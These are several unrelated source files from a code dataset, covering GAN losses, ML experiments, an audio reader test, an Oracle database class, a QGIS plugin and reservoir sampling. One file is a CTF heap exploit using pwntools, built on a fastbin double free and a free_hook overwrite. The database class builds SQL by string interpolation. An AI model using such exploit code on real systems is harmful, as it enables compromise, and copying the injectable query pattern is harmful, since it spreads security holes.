self.loss_grad_pen_B = self.gradient_penalty(cur_real_B,real_pred_B_2,self.r1)\n \n #self.loss_d_dec_reg_B=self.opt.r1 / 2 * r1_loss_B * self.opt.d_reg_every * temp\n \n #self.loss_d_dec_reg_A = 0 * self.loss_d_dec_reg_A\n #self.loss_d_dec_reg_B = 0 * self.loss_d_dec_reg_B\n else:\n self.loss_grad_pen_A = 0# * self.loss_grad_pen_A\n self.loss_grad_pen_B = 0# * self.loss_grad_pen_B\n\n #self.loss_d_dec += self.loss_d_dec_reg_A + self.loss_d_dec_reg_B\n self.loss_d_dec += self.loss_grad_pen_A + self.loss_grad_pen_B\n\n self.loss_d_dec.backward()\n\n def optimize_parameters(self):\n \"\"\"Calculate losses, gradients, and update network weights; called in every training iteration\"\"\"\n # forward\n self.forward() # compute fake images and reconstruction images.\n # G_A and G_B\n\n self.set_requires_grad([self.netDiscriminatorDecoderG_A,self.netDiscriminatorDecoderG_B], False)\n self.set_requires_grad([self.netG_A, self.netG_B], True)\n self.set_requires_grad([self.netDecoderG_A, self.netDecoderG_B], True)\n self.netDecoderG_A.zero_grad()\n self.netDecoderG_B.zero_grad()\n self.optimizer_G.zero_grad() # set G_A and G_B's gradients to zero\n self.backward_G() # calculate gradients for G_A and G_B\n self.optimizer_G.step() # update G_A and G_B's weights\n\n self.set_requires_grad([self.netf_s], True)\n # f_s\n self.optimizer_f_s.zero_grad()\n self.backward_f_s()\n self.optimizer_f_s.step()\n\n self.optimizer_D_Decoder.zero_grad()\n self.niter = self.niter +1\n self.set_requires_grad([self.netDiscriminatorDecoderG_A,self.netDiscriminatorDecoderG_B], True)\n self.backward_discriminator_decoder()\n self.optimizer_D_Decoder.step()\n self.set_requires_grad([self.netDiscriminatorDecoderG_A,self.netDiscriminatorDecoderG_B], False)\n\n def d_logistic_loss(self,real_pred, fake_pred):\n real_loss = F.softplus(-real_pred)\n fake_loss = F.softplus(fake_pred)\n\n return real_loss.mean() + fake_loss.mean()\n\n\n def d_r1_loss(self,real_pred, real_img):\n grad_real, = torch.autograd.grad(\n outputs=real_pred.sum(), inputs=real_img#, create_graph=True,allow_unused=True\n )\n \n grad_penalty = grad_real.pow(2).view(grad_real.shape[0], -1).sum(1).mean()\n \n return grad_penalty\n\n\n def g_nonsaturating_loss(self,fake_pred):\n loss = F.softplus(-fake_pred).mean()\n return loss\n\n\n def g_path_regularize(self,fake_img, latents, mean_path_length, decay=0.01):\n noise = torch.randn_like(fake_img) / math.sqrt(\n fake_img.shape[2] * fake_img.shape[3]\n )\n #print(noise.shape)\n \n #print(fake_img.shape)\n noise.requires_grad=True\n #latents.requires_grad=True\n #print(latents.shape)\n #print((fake_img * noise).sum())\n #print(latents.grad)\n #print((fake_img * noise).sum().grad)\n grad, = torch.autograd.grad(\n outputs=(fake_img * noise).sum(), inputs=latents, create_graph=True#,allow_unused=True\n )\n #print(grad)\n path_lengths = torch.sqrt(grad.pow(2).sum(2).mean(1))\n\n path_mean = mean_path_length + decay * (path_lengths.mean() - mean_path_length)\n\n path_penalty = (path_lengths - path_mean).pow(2).mean()\n\n return path_penalty, path_mean.detach(), path_lengths\n\n def make_noise(self,batch, latent_dim, n_noise, device):\n \n if n_noise == 1:\n return torch.randn(batch, latent_dim, device=device)\n\n noises = torch.randn(n_noise, batch, latent_dim, device=device)#.unbind(0)\n\n #print('ok')\n\n return noises\n\n def mixing_noise(self,batch, latent_dim, prob, device):\n log_size = int(math.log(128, 2))\n n_latent = log_size * 2 - 2\n temp = random.random()\n #temp=0.95\n #print('temp',temp)\n #print(prob)\n temp_noise = self.make_noise(batch, latent_dim, 2, device)\n if prob > 0 and temp < prob:\n #print('ok')\n inject_index = random.randint(1, n_latent - 1)\n else:\n inject_index = n_latent\n #temp_noise = self.make_noise(batch, latent_dim, 1, device)\n #print(temp_noise.shape)\n #print(temp_noise[0].shape)\n latent = temp_noise[0].unsqueeze(1).repeat(1, inject_index, 1)\n latent2 = temp_noise[1].unsqueeze(1).repeat(1, n_latent - inject_index, 1)\n latent = torch.cat([latent, latent2], 1)\n latents = []\n #print(latent.shape)\n return latent\n\n def reduce_sum(self,tensor):\n if not dist.is_available():\n return tensor\n\n if not dist.is_initialized():\n return tensor\n\n tensor = tensor.clone()\n dist.all_reduce(tensor, op=dist.ReduceOp.SUM)\n\n return tensor\n\n def get_world_size(self):\n if not dist.is_available():\n return 1\n\n if not dist.is_initialized():\n return 1\n\n return dist.get_world_size()\n\n def gradient_penalty(self,images, output, weight = 10):\n batch_size = images.shape[0]\n gradients = torch.autograd.grad(outputs=output, inputs=images,\n grad_outputs=torch.ones(output.size()).cuda(),\n create_graph=True, retain_graph=True, only_inputs=True)[0]\n\n gradients = gradients.view(batch_size, -1)\n return weight * ((gradients.norm(2, dim=1) - 1) ** 2).mean()\n","sub_path":"models/cycle_gan_semantic_mask_sty2_model.py","file_name":"cycle_gan_semantic_mask_sty2_model.py","file_ext":"py","file_size_in_byte":41955,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"295336834","text":"import os\r\nimport numpy as np\r\nfrom sklearn.model_selection import RepeatedKFold\r\nfrom sklearn import preprocessing\r\nimport pandas as pd\r\nfrom src.LogisticModelTree import LMT\r\nfrom src.ASForest_LMT import ASForest_LMT\r\nTASK = 'clf'\r\nNum_of_Learners = 100\r\nN_JOBS = 50\r\nsave_folder = os.path.join(\"output4\")\r\nDATA = [\r\n \"Sonar\",\r\n \"Seeds\",\r\n \"Bankruptcy\",\r\n \"Column2\",\r\n \"Column3\",\r\n \"Musk1\",\r\n \"ClimateModel\",\r\n \"BreastCancerDiagnosis\",\r\n \"ILPD\",\r\n \"bloodDonation\",\r\n \"PimaIndiansDiabetes\",\r\n \"Vehicle\",\r\n \"Biodeg\",\r\n \"DiabeticRetinopathyDebrecen\",\r\n \"Banknote\",\r\n \"Steel\",\r\n \"WaveForm\",\r\n]\r\nif __name__ == \"__main__\":\r\n ##\r\n kf = RepeatedKFold(n_splits=2, n_repeats=5, random_state=0)\r\n ##\r\n for d in range(len(DATA)):\r\n data_name = DATA[d]\r\n data_path = os.path.join(\"data\", data_name + \".csv\")\r\n data = pd.read_csv(data_path)\r\n y = data['label'].values\r\n X = data.drop('label', axis=1).values\r\n print('load data:', data_name)\r\n print('X :', X.shape, '|label :', y.shape)\r\n _, y = np.unique(y, return_inverse=True)\r\n #\r\n ASForestLMT_RI_ACC = []\r\n ASForestLMT_RC_ACC = []\r\n Kfold = 0\r\n for train_index, test_index in kf.split(X):\r\n Kfold += 1\r\n print('Dataset: ', d + 1, 'Kfold: ', Kfold)\r\n # MinMaxScaler\r\n train_X, train_y = X[train_index], y[train_index]\r\n test_X, test_y = X[test_index], y[test_index]\r\n min_max_scaler = preprocessing.MinMaxScaler()\r\n train_X = min_max_scaler.fit_transform(train_X)\r\n test_X = min_max_scaler.transform(test_X)\r\n # LMT_RI\r\n clf = LMT(RC='F')\r\n ASForestLMT_RI = ASForest_LMT(clf, Num_of_Learners, n_jobs=N_JOBS)\r\n ASForestLMT_RI.fit(train_X, train_y, test_X, test_y)\r\n ASForestLMT_RI_ACC.append(ASForestLMT_RI.EnsembleACC[-1])\r\n # LMT_RT\r\n clf = LMT(RC='T')\r\n ASForestLMT_RC = ASForest_LMT(clf, Num_of_Learners, n_jobs=N_JOBS)\r\n ASForestLMT_RC.fit(train_X, train_y, test_X, test_y)\r\n ASForestLMT_RC_ACC.append(ASForestLMT_RC.EnsembleACC[-1])\r\n\r\n # Save\r\n Result = []\r\n Result.append(ASForestLMT_RI_ACC)\r\n Result.append(ASForestLMT_RC_ACC)\r\n Result = np.array(Result)\r\n save_path = save_folder + '/ACC_' + data_name\r\n np.save(save_path, Result)\r\n","sub_path":"Experiment_4_LMT.py","file_name":"Experiment_4_LMT.py","file_ext":"py","file_size_in_byte":2484,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"150303800","text":"import os\nimport re\nimport midi\nimport random\nimport librosa\nimport fnmatch\nimport threading\nimport numpy as np\nimport tensorflow as tf\nimport time\nfrom lc_audio_reader import find_files, load_files, randomize_files, clean_midi_files, trim_silence, AudioReader, MidiMapper\n\nTEST_DATA_DIR = \"/home/vijay/Desktop/Summer2k17/Research/LCWavenet/\"\nLC_FILEFORMAT = \"*.mid\"\n\ndef load_file_test():\n\t\t'''Expects two midi and two audio files named the same file name and checks if the load files works as expected.'''\n\n\t\t# Set ground truths\n\t\texpected_audio_len = []\n\t\texpected_filename = ['/home/vijay/Desktop/Summer2k17/Research/LCWavenet/notes_test_format0.wav',\n\t\t\t\t\t\t\t '/home/vijay/Desktop/Summer2k17/Research/LCWavenet/scale_test_format0.wav']\n\t\texpected_gc_id = [None, None]\n\t\texpected_lc_timeseries_len = [3347, ]\n\n\t\t# load_files yields a generator\n\t\titerator = load_files(TEST_DATA_DIR, 16000, False, True, LC_FILEFORMAT)\n\n\t\t# query generator and check all values\n\t\tindex_counter = 0\n\t\tfor audio, filename, gc_id, lc_timeseries in iterator:\n\n\t\t\t# Note: files are randomized, so we cannot check sequentially if they match or not\n\t\t\t# check audio length\n\t\t\taudio_len = len(audio)\n\t\t\tassert (audio_len in expected_audio_len), \"Length of audio file {} not expected.\".format(index_counter)\n\n\t\t\t# check file name\n\t\t\t# assert (filename in expected_filename), \"Filename {} of audio file {} not expected.\".format(filename, index_counter)\n\n\t\t\t# gc_id should be none, randomized or not\n\t\t\tassert (gc_id in expected_gc_id), \"Unexpected GC ID.\"\n\n\t\t\t# check midi output length\n\t\t\tlc_length = len(lc_timeseries[0])\n\t\t\tassert (lc_length in expected_lc_timeseries_len), \"Length of MIDI timeseries {} not expected.\".format(index_counter)\n\n\t\t\tindex_counter += 1\n\n\t\tprint(\"Load file test passed.\")\n\n\nclass AudioReaderTest(tf.test.TestCase):\n\n\tdef setUp(self):\n\t\tself.coord = tf.train.Coordinator()\n\t\tself.threads = None\n\n\tdef testReader(self):\n\n\t\twith self.test_session() as sess:\n\t\t\tself.reader = AudioReader(data_dir = TEST_DATA_DIR,\n\t\t\t\t\t\t\tcoord = self.coord,\n\t\t\t\t\t\t\treceptive_field = 5117, #as opposed to 5120\n\t\t\t\t\t\t\tlc_enabled = True,\n\t\t\t\t\t\t\tlc_channels = 128,\n\t\t\t\t\t\t\tlc_fileformat = LC_FILEFORMAT,\n\t\t\t\t\t\t\tsess = sess)\n\n\t\t\tdqd_audio = self.reader.dq_audio(1)\n\t\t\tprint(\"Here 1\")\n\t\t\tdqd_upsampled_midi = self.reader.dq_lc(1)\n\t\t\tprint(dqd_audio)\n\t\t\tprint(dqd_upsampled_midi)\n\t\t\tprint(\"Here 2\")\n\n\t\t\tself.threads = tf.train.start_queue_runners(sess = sess, coord = self.coord)\n\t\t\tprint(\"Here 3\")\n\t\t\tsess.run(tf.global_variables_initializer())\n\t\t\tprint(\"Here 4\")\n\t\t\tself.reader.start_threads()\n\t\t\tprint(\"Here 5\")\n\t\t\ttime.sleep(10)\n\n\t\t\tprint(\"TIME'S UP\")\n\n\t\t\tself.coord.request_stop()\n\t\t\tself.coord.join(self.threads)\n\n\nif __name__ == '__main__':\n\tload_file_test()\n\ttf.test.main()\n","sub_path":"wavenet/test_audio_reader.py","file_name":"test_audio_reader.py","file_ext":"py","file_size_in_byte":2758,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"407684647","text":"import cx_Oracle\nimport datetime\nfrom Common import Common\nfrom Define import Define\n\nclass Database(object):\n\n\n def __init__(self, startDate, finishDate, reference, mode, iniReader, log):\n \"\"\"\n connect to the database and read and store the necessary data\n :param startDate: 'yyyyMMddHHmm'\n :param finishDate: 'yyyyMMddHHmm'\n :param reference: reference name\n :param mode: map scan mode(FD, ELA, LA)\n :param iniReader: object of ConfigParser\n :param log: object of logger Class\n \"\"\"\n self.logger = log\n self.logger.logger.info('start load database and save data')\n self.dateList = [] # 시계열차트에 X축에 필요한 날짜 저장 리스트\n self.dataDic = {} # 품질지표 데이터 저장을 위한 딕셔너리, value type : list\n self.common = Common(self.logger)\n self.define = Define()\n try:\n DB_cursor = self.connect_DB(iniReader.connectDB)\n self.divide_date(startDate, finishDate) # Database Query에 날짜 기간 설정을 위한 데이터 저장을 위해 함수 호출\n self.add_dateList() # dateList 리스트에 순차적으로 날짜 저장\n key_instance = self.get_query_dataDic_key(DB_cursor, iniReader.product)\n # key_instance는 테이블이 없을경우 데이터를 가져올 수 없어 None을 리턴하기 때문에 조건문을 추가하여 Database객체를 빠져나오게 함\n if key_instance == None:\n self.valueCheck = False\n self.logger.logger.info('No Database Table')\n return\n self.generate_dataDic_key(key_instance)\n value_instance = self.get_query_dataDic_value(DB_cursor, iniReader.product, reference, mode)\n self.valueCheck = self.add_dataDic_value(value_instance) # 테이블은 있지만 조건에 맞는 데이터가 없는 경우 valueCheck는 False, 아닐경우 True\n if self.valueCheck == False:\n self.logger.logger.info('No Database Data')\n except cx_Oracle.DatabaseError:\n raise cx_Oracle.DatabaseError\n finally:\n self.logger.logger.info('finish load database and save data')\n\n def connect_DB(self, dbAddress):\n \"\"\"\n connect to the database\n :param dbAddress: database address\n :return: database cursor\n \"\"\"\n con = cx_Oracle.connect(dbAddress)\n return con.cursor()\n\n def divide_date(self, startDate, finishDate):\n \"\"\"\n generate dictionary and store the date and the previous date in dictionary format\n :param startDate: 'yyyyMMddHHmm'\n :param finishDate: 'yyyyMMddHHmm'\n :return: dictionary with previous date and date\n \"\"\"\n self.startYear, self.startMonth, self.startDay = self.common.split_date(startDate)\n self.finishYear, self.finishMonth, self.finishDay = self.common.split_date(finishDate)\n\n def add_dateList(self):\n \"\"\"\n add the date from the previous date to the date in the list\n \"\"\"\n # 끝나는 날짜만큼 하루씩 증가하여 dateList에 저장\n year, month, day = self.startYear, self.startMonth, self.startDay\n while True:\n if year == self.finishYear and month == self.finishMonth and day == self.finishDay:\n self.dateList.append(datetime.datetime(int(year), int(month), int(day), 0, 0))\n break\n self.dateList.append(datetime.datetime(int(year), int(month), int(day), 0, 0))\n year, month, day = self.common.get_day(year, month, day, 1)\n\n def get_query_dataDic_key(self, DB_cursor, product):\n \"\"\"\n fetch a query statement to get the key of dataDic\n :param DB_cursor: database cursor\n :param product: product name\n :return: database cursor with result\n \"\"\"\n # dataDic에 key값을 뽑아내기 위한 Query\n try:\n DB_cursor.execute('select distinct quality_indicator from tb_%s_stat' %(product))\n return DB_cursor\n except cx_Oracle.DatabaseError:\n return None\n\n def get_query_dataDic_value(self, DB_cursor, product, reference, mode):\n \"\"\"\n fetch a query statment to get 5 column information\n :param DB_cursor: database cursor\n :param product: product name\n :param reference: reference name\n :param mode: map scan mode\n :return: database cursor with result\n \"\"\"\n # dataDic에 value값을 뽑아내기 위한 Query\n try:\n query = \"select quality_indicator, sampling_start, ref_product_id, mode_id, average from tb_%s_stat \" \\\n \"where sampling_start between to_timestamp('%s%s%s', 'YYYYMMDD') and to_timestamp('%s%s%s', 'YYYYMMDD')\"\\\n \"and ref_product_id LIKE '%%%s%%'\"\\\n \"and mode_id = '%s' \"\\\n \"order by sampling_start, quality_indicator\"\\\n % (product, self.startYear, self.startMonth, self.startDay, self.finishYear, self.finishMonth, self.finishDay,\n reference.upper(), mode)\n DB_cursor.execute(query)\n return DB_cursor\n except cx_Oracle.DatabaseError:\n return None\n\n def add_dataDic_value(self, value_instance):\n \"\"\"\n add value to the corresponding key in dataDic\n :param value_instance: database cursor with 5 column information\n :return: check variable whether data exists or not\n \"\"\"\n # 뽑아낸 Query로 해당 key에 맞추어 값 저장\n # 3중 for문이기 때문에 안에 breakYN 변수를 두어 2번째 for문 break할때 사용\n self.init_dataDic_value()\n breakYN = True\n dataCheck = False\n for instance in value_instance:\n for quality_indicator in self.dataDic.keys():\n if instance[self.define.QUALITY_INDICATOR] == quality_indicator:\n for i, date in enumerate(self.dateList):\n if instance[self.define.SAMPLING_START] == date:\n self.dataDic[quality_indicator][i] = instance[self.define.AVERAGE]\n breakYN = False\n dataCheck = True\n break\n if breakYN == False:\n break\n breakYN=True\n return dataCheck\n\n def generate_dataDic_key(self, key_instance):\n \"\"\"\n generate key in dataDic\n :param key_instance: database cursor with quality_indicator\n \"\"\"\n # 뽑아낸 Query로 key와 value 생성\n for instance in key_instance:\n if instance[self.define.QUALITY_INDICATOR] in self.dataDic.keys():\n break\n else:\n self.dataDic[instance[self.define.QUALITY_INDICATOR]] = []\n\n def init_dataDic_value(self):\n \"\"\"\n init value of key in dataDic\n \"\"\"\n # key값에 있는 value값 날짜 수만큼 초기화\n for _, _ in enumerate(self.dateList):\n for quality_indicator in self.dataDic.keys():\n if 'NUM' in quality_indicator:\n self.dataDic[quality_indicator].append(0)\n else:\n self.dataDic[quality_indicator].append(None)\n","sub_path":"Database.py","file_name":"Database.py","file_ext":"py","file_size_in_byte":7369,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"450051565","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\n***************************************************************************\n PSWESpeed.py\n ---------------------\n Date : May 2014\n Copyright : (C) 2014 by Riccardo Lemmi\n Email : riccardo at reflab dot com\n***************************************************************************\n* *\n* This program is free software; you can redistribute it and/or modify *\n* it under the terms of the GNU General Public License as published by *\n* the Free Software Foundation; either version 2 of the License, or *\n* (at your option) any later version. *\n* *\n***************************************************************************\n\"\"\"\n\n__author__ = 'Riccardo Lemmi'\n__date__ = 'May 2014'\n__copyright__ = '(C) 2014, Riccardo Lemmi'\n# This will get replaced with a git SHA1 when you do a git archive\n__revision__ = '$Format:%H$'\n\n\nfrom osgeo import gdal\nimport numpy\n\nimport utils\n\nfrom processing.core.GeoAlgorithm import GeoAlgorithm\nfrom processing.core.outputs import OutputRaster\n\nfrom processing.core.parameters import ParameterVector\nfrom processing.core.parameters import ParameterNumber\nfrom processing.core.parameters import ParameterExtent\n\n\nclass PSEWSpeedAlg:\n # Computation of the horizontal speed of PS East-West \n \n def __init__(\n self,\n asc_input_path, \n desc_input_path,\n extent,\n point_size,\n cd_e_asc,\n cd_h_asc,\n cd_e_desc,\n cd_h_desc,\n output_path):\n \n self.asc_input_path = asc_input_path\n self.desc_input_path = desc_input_path\n\n self.extent = extent\n self.point_size = point_size\n \n self.cd_e_asc = cd_e_asc\n self.cd_h_asc = cd_h_asc\n self.cd_e_desc = cd_e_desc\n self.cd_h_desc = cd_h_desc\n \n self.output_path = output_path\n\n def _save(self, array):\n # create the output image\n driver = gdal.GetDriverByName('GTiff')\n dst = driver.Create(\n self.output_path,\n self.cols, \n self.rows,\n 1, # number of bands\n gdal.GDT_Float32) # data type\n\n # set geotrasform and projection\n new_ulx, new_uly, new_lrx, new_lry = self.extent\n dst.SetGeoTransform([new_ulx, self.point_size, 0, new_uly, self.point_size])\n #dst.SetProjection( gdal.Open(\"/tmp/ascending_raster.tiff\").GetProjection() )\n #\n \n self.bandOut = dst.GetRasterBand(1)\n self.bandOut.SetNoDataValue(-3.4e+38)\n #bandOut.SetStatistics(\n # self.min,\n # self.max,\n # numpy.mean([self.max, self.min]),\n # self.std)\n \n self.bandOut.WriteArray(array)\n self.bandOut.FlushCache()\n\n def compute(self):\n #\n \n # Feature to Raster\n ras_asc_path = \"/tmp/ascending_raster.tiff\" # tmp file, Ras -> Raster\n utils.rasterize(self.asc_input_path, ras_asc_path, self.point_size) \n clipped_asc_array = utils.clip_from_extent_as_array(ras_asc_path, self.extent)\n \n ras_desc_path = \"/tmp/descending_raster.tiff\" # tmp file\n utils.rasterize(self.desc_input_path, ras_desc_path, self.point_size) \n clipped_desc_array = utils.clip_from_extent_as_array(ras_desc_path, self.extent)\n\n # Constant images\n self.rows, self.cols = clipped_asc_array.shape\n CosDir1_array = self.cd_e_desc * numpy.ones((self.rows, self.cols), dtype=numpy.byte)\n CosDir2_array = self.cd_h_desc * numpy.ones((self.rows, self.cols), dtype=numpy.byte)\n CosDir3_array = self.cd_e_asc * numpy.ones((self.rows, self.cols), dtype=numpy.byte)\n CosDir4_array = self.cd_h_asc * numpy.ones((self.rows, self.cols), dtype=numpy.byte)\n\n # \"(([ResDisc] div [CosDir2]) - ([ResAsc] div ([CosDir4])) ) div (([CosDir1] div [CosDir2]) - ([CosDir3] div ([CosDir4])))\"\n num = ((clipped_desc_array / CosDir2_array) - (clipped_asc_array / CosDir4_array))\n den = ((CosDir1_array / CosDir2_array) - (CosDir3_array / CosDir4_array)) # for den == [0...] -> wrong image\n ew_speed_array = num / den\n \n self._save(ew_speed_array)\n\n def __enter__(self):\n return self\n\n def __exit__(self, exc_type, exc_val, exc_tb):\n # set the geotransform and projection on the output\n #self.imageOut.SetGeoTransform(self.imageIn.GetGeoTransform())\n #self.imageOut.SetProjection(self.imageIn.GetProjection())\n\n ## build pyramids for the output\n #gdal.SetConfigOption('HFA_USE_RRD', 'YES')\n #self.imageOut.BuildOverviews(overviewlist=[2,4,8,16])\n # del dst???\n pass\n\n\nclass PSEWSpeedGeoAlg(GeoAlgorithm):\n \"\"\" was PS_VelEo.py \"\"\"\n \n ASC_INPUT = \"ASC_INPUT\" # Ascending -> SHP\n DESC_INPUT = \"DISC_INPUT\" # Descending -> SHP\n \n EXTENT = \"EXTENT\" \n POINT_SIZE = \"POINT_SIZE\" \n \n COSENO_DIRETTORE_E_ASCENDENTE = \"CD_E_ASC\"\n COSENO_DIRETTORE_H_ASCENDENTE = \"CD_H_ASC\"\n COSENO_DIRETTORE_E_DISCENDENTE = \"CD_E_DISC\" # Cosine Director East Descending\n COSENO_DIRETTORE_H_DISCENDENTE = \"CD_H_DISC\" # ... H?\n\n OUTPUT_PATH = \"OUTPUT_PATH\" # Raster\n \n def defineCharacteristics(self):\n self.name = \"Model to compute East-West horizontal component of speed for PS points\"\n self.group = \"[pstools]\"\n \n self.addParameter(ParameterVector(PSEWSpeedGeoAlg.ASC_INPUT, \n \"Ascending Vector\")) \n self.addParameter(ParameterVector(PSEWSpeedGeoAlg.DESC_INPUT, \n \"Descending Vector\")) \n \n self.addParameter(ParameterExtent(PSEWSpeedGeoAlg.EXTENT, \n \"Extent\")) \n self.addParameter(ParameterNumber(PSEWSpeedGeoAlg.POINT_SIZE, \n \"Point Size\", \n minValue=1,\n default=25))\n \n self.addParameter(ParameterNumber(PSEWSpeedGeoAlg.COSENO_DIRETTORE_E_ASCENDENTE, \n \"Cosine Director East Ascending\",\n minValue=0.0, \n maxValue=1.0,\n default=0.6))\n self.addParameter(ParameterNumber(PSEWSpeedGeoAlg.COSENO_DIRETTORE_H_ASCENDENTE, \n \"Cosine Director Horizontal Ascending\", \n minValue=0.0, \n maxValue=1.0,\n default=0.5))\n self.addParameter(ParameterNumber(PSEWSpeedGeoAlg.COSENO_DIRETTORE_E_DISCENDENTE, \n \"Cosine Director East Descending\", \n minValue=0.0, \n maxValue=1.0,\n default=0.8))\n self.addParameter(ParameterNumber(PSEWSpeedGeoAlg.COSENO_DIRETTORE_H_DISCENDENTE,\n \"Cosine Director Horizontal Descending\",\n minValue=0.0, \n maxValue=1.0,\n default=0.5))\n \n\n self.addOutput(OutputRaster(PSEWSpeedGeoAlg.OUTPUT_PATH, \n \"East-West Speed Image\"))\n\n def processAlgorithm(self, progress):\n asc_input_path = str(self.getParameterValue(PSEWSpeedGeoAlg.ASC_INPUT))\n desc_input_path = str(self.getParameterValue(PSEWSpeedGeoAlg.DESC_INPUT))\n extent = utils.convert_parameter(self.getParameterValue(PSEWSpeedGeoAlg.EXTENT))\n point_size = self.getParameterValue(PSEWSpeedGeoAlg.POINT_SIZE)\n cd_e_asc = self.getParameterValue(PSEWSpeedGeoAlg.COSENO_DIRETTORE_E_ASCENDENTE)\n cd_h_asc = self.getParameterValue(PSEWSpeedGeoAlg.COSENO_DIRETTORE_H_ASCENDENTE)\n cd_e_desc = self.getParameterValue(PSEWSpeedGeoAlg.COSENO_DIRETTORE_E_DISCENDENTE)\n cd_h_desc = self.getParameterValue(PSEWSpeedGeoAlg.COSENO_DIRETTORE_H_DISCENDENTE)\n \n #...\n output_path = str(self.getOutputValue(PSEWSpeedGeoAlg.OUTPUT_PATH))\n \n with PSEWSpeedAlg(\n asc_input_path, \n desc_input_path,\n extent,\n point_size,\n cd_e_asc,\n cd_h_asc,\n cd_e_desc,\n cd_h_desc,\n output_path) as vel:\n vel.compute()\n","sub_path":"PSEWSpeed.py","file_name":"PSEWSpeed.py","file_ext":"py","file_size_in_byte":9120,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"248544486","text":"from pwn import *\n\n# conn = remote(\"pwn.buuoj.cn\",20173)\nssh_conn = ssh('root','localhost',2222,'waterdrop')\nconn = ssh_conn.process([\"/root/pwn\"])\ngdb.attach(conn,\"c\")\n\ne = ELF(\"./ciscn_2019_es_1\")\nlibc = ELF(\"../libc-2.23.so\")\n# context.log_level = \"debug\"\n\ndef add(size,name,call):\n conn.recvuntil(\"choice:\")\n conn.sendline('1')\n conn.recvuntil(\"Please input the size of compary's name\\n\")\n conn.sendline(str(size))\n conn.recvuntil(\"please input name:\\n\")\n conn.send(name)\n conn.recvuntil(\"please input compary call:\")\n conn.sendline(call)\n conn.recvuntil(\"Done!\")\n\ndef show(index):\n conn.recvuntil(\"choice:\")\n conn.sendline('2')\n conn.recvuntil(\"Please input the index:\\n\")\n conn.sendline(str(index))\n conn.recvuntil(\"name:\\n\")\n res = conn.recvuntil(\"\\nphone:\",drop=True)\n conn.recvuntil(\"Done!\\n\")\n return res\n\ndef call(index):\n conn.recvuntil(\"choice:\")\n conn.sendline('3')\n conn.recvuntil(\"Please input the index:\\n\")\n conn.sendline(str(index))\n conn.recvuntil(\"Done\")\n\nadd(0x98,'liwl23','13113113313')\nadd(0x18,'liwl23','13113113313')\ncall(0)\nheap_base = (u64(show(0)[:8].ljust(8,'\\x00'))>>12)<<12\nlibc.address = heap_base\nfree_hook = heap_base + 0x27a8\nsys_addr = libc.sym['system']\nadd(0x78,'A'*0x20+p64(0)+p64(0x51),'A')\nadd(0x48,'A'*0x20+p64(0)+p64(0x51),'A')\nadd(0x48,'A','A')\nadd(0x18,p64(0)+p64(0x21),'A')\ncall(3)\ncall(4)\ncall(3)\nadd(0x48,'\\x50','A')\nadd(0x48,p64(0)+p64(0x51),'A')\nadd(0x48,p64(free_hook-9),'A')\nadd(0x48,\"A\"*0x20+p64(0)+p64(0x21),'a')\n\nconn.interactive()","sub_path":"pwnable/ciscn_2019_es_1/exp.py","file_name":"exp.py","file_ext":"py","file_size_in_byte":1553,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"366315859","text":"'''\r\nCreated on Aug 31, 2014\r\n\r\n@author: Mitesh\r\n'''\r\n\r\nimport random\r\n\r\n# input is the stream of data (of infinite or very large length), out of which we need to sample N elements\r\ndef reservoirSampling(input_data, N):\r\n sample = [None] * N\r\n\r\n for i in range(0, len(input_data)-1):\r\n if i < N:\r\n sample[i] = input_data[i]\r\n else:\r\n rand_prob = random.random()\r\n if rand_prob < N/float(i+1):\r\n replace_index = random.randint(0, N-1)\r\n sample[replace_index] = input_data[i]\r\n return sample \r\n \r\n\r\nif __name__ == '__main__':\r\n input_data = [5, 6, 2, 6, 1, 0 , 100, 10, 7, 9, 0]\r\n sampled_data = reservoirSampling(input_data=input_data, N=5)\r\n print(sampled_data)\r\n \r\n\r\n'''\r\nhttp://data-analytics-tools.blogspot.com/2009/09/reservoir-sampling-algorithm-in-perl.html\r\nhttp://en.wikipedia.org/wiki/Reservoir_sampling\r\n\r\nAlgorithms that perform calculations on evolving data streams, but in fixed memory, have increasing relevance in the Age of Big Data.\r\n\r\nThe reservoir sampling algorithm outputs a sample of N lines from a file of undetermined size. It does so in a single pass, using memory proportional to N.\r\n\r\nThese two features -- (i) a constant memory footprint and (ii) a capacity to operate on files of indeterminate size -- make it ideal for working with very large data sets common to event processing.\r\n\r\nWhile it has likely been multiply discovered and implemented, like many algorithms, it was codified by Knuth's The Art of Computer Programming.\r\n\r\nThe trick of this algorithm is to first fill up the sample buffer, and afterwards, to probabilistically replace it with additional lines of input.\r\n\r\n\r\n\r\n#!/usr/bin/python\r\nimport sys\r\nimport random\r\n \r\nif len(sys.argv) == 3:\r\n input = open(sys.argv[2],'r')\r\nelif len(sys.argv) == 2:\r\n input = sys.stdin;\r\nelse:\r\n sys.exit(\"Usage: python samplen.py \")\r\n \r\nN = int(sys.argv[1]);\r\nsample = [];\r\n \r\nfor i,line in enumerate(input):\r\n if i < N:\r\n sample.append(line)\r\n elif i >= N and random.random() < N/float(i+1):\r\n replace = random.randint(0,len(sample)-1)\r\n sample[replace] = line\r\n \r\nfor line in sample:\r\n sys.stdout.write(line)\r\n \r\n \r\nFor example, imagine we are to sample 5 lines randomly from a 6-line file. Call i the line number of the input, and N the size of sample desired. For the first 5 lines (where i < = N), our sample fills entirely. (For the non-Perl hackers: the current line number i is held by the variable $., just as the special variable $_ holds the current line value).\r\n\r\nIt's at successive lines of input that the probabilistic sampling starts: the 6th line has a 5/6th (N/i) chance of being sampled, and if chosen, it will replace one of the previously 5 chosen lines with a 1/5 chance: leaving them a (5/6 * 1/5) = 5/6 chance of being sampled. Thus all 6 lines have an equal chance of being sampled.\r\n\r\nIn general, as more lines are seen, the chance that any additional line is chosen for the sample falls; but the chance that any previously chosen line could be replaced grows. These two balance such that the probability for any given line of input to be sampled is identical.\r\n\r\nA more sophisticated variation of this algorithm is one that can take into consideration a weighted sampling. '''\r\n \r\n 